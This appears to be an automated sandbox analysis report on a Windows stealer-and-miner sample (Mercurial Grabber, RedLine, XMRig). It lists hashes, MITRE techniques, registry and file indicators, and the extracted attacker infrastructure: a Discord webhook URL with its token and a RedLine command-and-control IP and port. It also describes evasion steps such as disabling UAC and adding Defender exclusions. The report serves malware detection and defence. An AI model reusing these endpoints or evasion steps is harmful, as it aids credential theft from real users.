mercurialgrabber | d09bafb8d1a2c81142d5ebc9d259810e731a645774f6a0967dfcc18e32ca7dd6

Analysis

max time kernel
650s
max time network
665s
platform
windows11-21h2_x64
resource
win11-20240730-fr
resource tags

arch:x64arch:x86image:win11-20240730-frlocale:fr-fros:windows11-21h2-x64systemwindows
submitted
30-07-2024 21:53

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

sbHBAhjbsa.exe
Size

41KB
MD5

afbb43b44b95fecee1d017414031254b
SHA1

d9546073e6a5da4b684ce8e86cef8bfb2354f18a
SHA256

d09bafb8d1a2c81142d5ebc9d259810e731a645774f6a0967dfcc18e32ca7dd6
SHA512

9e7453b66c83cafc9f0c0fc46cd17568a80e84793f7c6f28d21c8236ca16cd549ff8f1383e1b20dccbce26dd4f48a60ac3a43187f0c452412e1aee232a1bbdc2
SSDEEP

768:7scWsQj++y0WybOVioqwluZFenWTjMKZKfgm3EhRA:gcB+6GenWTwF7ErA

Score

10^/10

mercurialgrabber redline xmrig credential_access defense_evasion discovery evasion execution infostealer miner motw persistence phishing spyware stealer trojan upx

Malware Config

Extracted

Family

mercurialgrabber

https://discordapp.com/api/webhooks/1265115897622822922/sKHSkvAozNOKztWBy15s30wzxno1ChZP19kVme6i0-pZiewoQf_88CDgmR0iIigJbbL4

Extracted

Family

redline

185.196.9.26:6302

Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
stealer mercurialgrabber
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/2248-2469-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Loader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Loader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Loader (1).exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Loader.exe

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/4004-2458-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2460-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2461-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2459-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2457-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2455-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2454-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2597-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/4004-2598-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
110	2872	powershell.exe
111	2872	powershell.exe
112	4636	powershell.exe
113	4636	powershell.exe
123	4920	powershell.exe
124	4920	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4120	powershell.exe
2276	powershell.exe
1124	powershell.exe
2760	powershell.exe
280	powershell.exe
4620	powershell.exe
3976	powershell.exe
2872	powershell.exe
4636	powershell.exe
3056	powershell.exe
4920	powershell.exe
1172	powershell.exe
1092	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\winhb.sys	Loader.exe
File opened for modification	C:\Windows\System32\drivers\winhb.sys	Loader.exe
File created	C:\Windows\System32\drivers\winhb.sys	Loader.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader (1).exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader (1).exe

Executes dropped EXE 19 IoCs

pid	Process
236	sbHBAhjbsa.exe
4544	sbHBAhjbsa.exe
1084	sbHBAhjbsa.exe
3396	sbHBAhjbsa.exe
1328	sbHBAhjbsa.exe
440	BlackLauncher.exe
3908	BlackLauncher.exe
4948	TDoZSSz.exe
3704	Updater.exe
3108	7UkbkOq.exe
2508	W4hrCBo.exe
2140	Updater.exe
4288	OMhB4fX.exe
2100	BlackLauncher.exe
5116	BlackLauncher.exe
6440	Loader.exe
4744	Loader.exe
6972	Loader (1).exe
776	Loader.exe

Loads dropped DLL 2 IoCs

pid	Process
3108	7UkbkOq.exe
4288	OMhB4fX.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4004-2451-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2450-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2458-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2460-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2461-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2459-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2457-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2455-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2454-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2453-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2452-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2449-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2597-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/4004-2598-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Loader (1).exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Loader.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Loader.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
29	camo.githubusercontent.com
80	raw.githubusercontent.com
110	bitbucket.org
112	bitbucket.org
120	bitbucket.org
1	pastebin.com
29	raw.githubusercontent.com
29	bitbucket.org
115	pastebin.com
123	bitbucket.org

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	ip4.seeip.org
92	ip4.seeip.org
99	ip4.seeip.org
103	ip4.seeip.org
1	ip4.seeip.org
2	ip4.seeip.org
3	ip-api.com
81	ip4.seeip.org

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
357	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Power Settings 1 TTPs 2 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2208	cmd.exe
6292	powercfg.exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	W4hrCBo.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2444}	Loader.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2444}	Loader.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2444}	Loader.exe
File created	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2899}\male.names	Loader.exe
File opened for modification	C:\Windows\system32\MRT.exe	TDoZSSz.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe
File created	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2899}\favicon1.ico	Loader.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF	chrome.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2879}	Loader.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2859}	Loader.exe
File opened for modification	C:\Windows\System32\IME\IMETC\{69CD1F2D-DF68-4E23-9108-1B70783F2879}	Loader.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2899}	Loader.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\IME\SHARED\namef.ini	Loader.exe
File opened for modification	C:\Windows\System32\IME\SHARED\namef.ini	Loader.exe
File opened for modification	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2869}	Loader.exe
File created	C:\Windows\System32\config\RegBack\{69CD1F2D-DF68-4E23-9108-1B70783F2899}\female.names	Loader.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
6440	Loader.exe
4744	Loader.exe
6972	Loader (1).exe
776	Loader.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3704 set thread context of 448	3704	Updater.exe	235
PID 3704 set thread context of 4004	3704	Updater.exe	236
PID 3108 set thread context of 2248	3108	7UkbkOq.exe	239
PID 4288 set thread context of 4696	4288	OMhB4fX.exe	287

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-UPDATE}	Loader.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-UPDATE}	Loader.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-UPDATE}	Loader.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-1B70783F2893}	Loader.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-1B70783F2892}	Loader.exe
File opened for modification	C:\Windows\schemas\Provisioning\{69CD1F2D-DF68-4E23-9108-1B70783F2859}	Loader.exe

Launches sc.exe 37 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4440	sc.exe
4836	sc.exe
776	sc.exe
4048	sc.exe
6400	sc.exe
2352	sc.exe
2864	sc.exe
6748	sc.exe
684	sc.exe
868	sc.exe
4308	sc.exe
4544	sc.exe
6728	sc.exe
1892	sc.exe
2984	sc.exe
4892	sc.exe
652	sc.exe
568	sc.exe
1320	sc.exe
4064	sc.exe
1404	sc.exe
5588	sc.exe
3308	sc.exe
1740	sc.exe
1840	sc.exe
5988	sc.exe
5700	sc.exe
2200	sc.exe
1320	sc.exe
6864	sc.exe
5968	sc.exe
128	sc.exe
580	sc.exe
3056	sc.exe
3248	sc.exe
1800	sc.exe
584	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\sbHBAhjbsa.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Loader.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Loader (1).exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OMhB4fX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7UkbkOq.exe

Checks processor information in registry 2 TTPs 27 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sbHBAhjbsa.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sbHBAhjbsa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803380633-1574714764-2315899217-1000\{A5F47C13-8801-45EF-8E83-8DF4F6D54D52}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3803380633-1574714764-2315899217-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803380633-1574714764-2315899217-1000\{BB2F4B8B-1557-4A4E-8AB2-A78DCB3E586A}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4320	reg.exe

NTFS ADS 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Loader (1).exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 899499.crdownload:SmartScreen	msedge.exe
